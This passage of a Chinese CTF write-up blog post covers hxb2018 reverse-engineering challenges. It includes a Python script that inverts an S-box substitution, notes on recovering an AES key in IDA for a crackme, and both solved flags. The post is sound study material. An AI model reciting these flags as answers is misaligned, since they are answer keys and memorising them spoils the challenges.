0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,</span><br><span class="line"></span><br><span class="line">                               0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,</span><br><span class="line"></span><br><span class="line">                               0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,</span><br><span class="line"></span><br><span class="line">                               0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,</span><br><span class="line"></span><br><span class="line">                               0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,</span><br><span class="line"></span><br><span class="line">                               0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,</span><br><span class="line"></span><br><span class="line">                               0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,</span><br><span class="line"></span><br><span class="line">                               0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]</span><br></pre></td></tr></table></figure>



<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">key &#x3D; [50, 97, 52, 57, 102, 54, 57, 99, 51, 56, 51, 57, 53, 99, 100, 101, 57, 54, 100, 54, 100, 101, 57, 54, 100, 54, 102, 52, 101, 48, 50, 53, 52, 56, 52, 57, 53, 52, 100, 54, 49, 57, 53, 52, 52, 56, 100, 101, 102, 54, 101, 50, 100, 97, 100, 54, 55, 55, 56, 54, 101, 50, 49, 100, 53, 97, 100, 97, 101, 54]</span><br><span class="line"> </span><br><span class="line">f &#x3D; &#39;&#39;</span><br><span class="line">for i in range(0,35):</span><br><span class="line">       for j in range(0,256):</span><br><span class="line">        	v5 &#x3D; chr(j)</span><br><span class="line">        	v6 &#x3D; (ord(v5)&gt;&gt;4)%16</span><br><span class="line">        	v7 &#x3D; (16*ord(v5)&gt;&gt;4)%16</span><br><span class="line">			v8 &#x3D; key[2*i]</span><br><span class="line">	   		if v8 &lt; 48 or v8 &gt; 57:</span><br><span class="line">	     		v9 &#x3D; v8 - 87</span><br><span class="line">       		else:</span><br><span class="line">				v9 &#x3D; v8 - 48</span><br><span class="line">			v11 &#x3D; v9*16</span><br><span class="line">			v10 &#x3D; key[2*i+1]</span><br><span class="line">			if v10 &lt; 48 or v10 &gt; 57:</span><br><span class="line">				v12 &#x3D; v10 - 87</span><br><span class="line">			else:</span><br><span class="line">				v12 &#x3D; v10 - 48</span><br><span class="line">			if box[16*v6+v7] &#x3D;&#x3D; ((v11+v12)^0x19):</span><br><span class="line">				f +&#x3D; v5</span><br><span class="line">print f</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image024.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: flag&#123;Th1s_1s_Simple_Rep1ac3_Enc0d3&#125;</span><br></pre></td></tr></table></figure>



<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="Common-Crypto"><a href="#Common-Crypto" class="headerlink" title="Common Crypto"></a>Common Crypto</h2><p>拿到exe打开要求输入flag，随便输点东西回车程序就关了。于是直接扔到IDA里看。（截图中变量名有的经过自定义，为了方便看）</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image064.jpg"></p>
<p>gets获取输入的flag，然后进入sub_140001000(&amp;key);这个函数查看。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image066.jpg"></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image068.jpg"></p>
<p>能够清晰的找到这里的key值，把它取出来</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image070.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">key &#x3D; [0x1b, 0x2e, 0x35, 0x46, 0x58, 0x6e ,0x72, 0x86, 0x9b,0xa7,0xb5,</span><br><span class="line"></span><br><span class="line">0xc8,0xd9,0xef,0xff,0xc]</span><br></pre></td></tr></table></figure>

<p>下面的处理过程经过和AES加密的代码对比，应该是正常的加密过程。</p>
<p>再进入<code>sub_1400012A0((unsigned __int8 *)&amp;flag, (__int64)&amp;key);</code>这个函数查看。基本上确定是常规的AES加密，代码过多不再贴图。</p>
<p>但是有个问题是key的长度是16，加密后做比较的字符串长度却太长了</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image072.jpg"></p>
<p>按照原理，密钥长度是根据明文扩展的，而明文和密文应该是一样长，于是尝试把这段密文分成两半。分别尝试解密过程。幸运的是，前半段就成功了。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image074.jpg"></p>
<p>解出来一堆数字，再结合刚刚后半段的数字，猜测是十六进制转字符串。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image076.jpg"></p>
<p>自己添加个}，尝试提交成功。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag:  hxb2018&#123;aa8871759de6f35215205566&#125;</span><br></pre></td></tr></table></figure>



<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>累了，睡了，醒来学习二进制、、、 </p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:v0wldl@163.com">V0WKeep3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="/v0w.top/2018/11/18/hxb2018-WP/">v0w.top/2018/11/18/hxb2018-WP/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="v0w.top">V0W's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/SSTI/">SSTI</a><a class="post-meta__tags" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a><a class="post-meta__tags" href="/tags/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a><a class="post-meta__tags" href="/tags/SSRF/">SSRF</a></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="http://image.v0w.top/Blog/2020-08-28-044057.png"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="http://image.v0w.top/Blog/2020-08-28-044040.png"><div class="post-qr-code__desc">微信打赏</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/11/23/SSRF-notes/"><i class="fa fa-chevron-left">  </i><span>SSRF 学习笔记</span></a></div><div class="next-post pull-right"><a href="/2018/11/12/HCTF-WP/"><span>HCTF2018-WP</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == true ? true : false;
var verify = 'false' == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'xuqLRcah5FaInOgKRdj9JB3V-gzGzoHsz',
  appKey:'8vMPXnFoh7Fih1g29jw4JNxl',
  placeholder:'师傅可以留下你的评论和邮箱，V0W能够通过邮件get并回复哦～',
  avatar:'retro',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/index.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2020 By V0WKeep3r</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>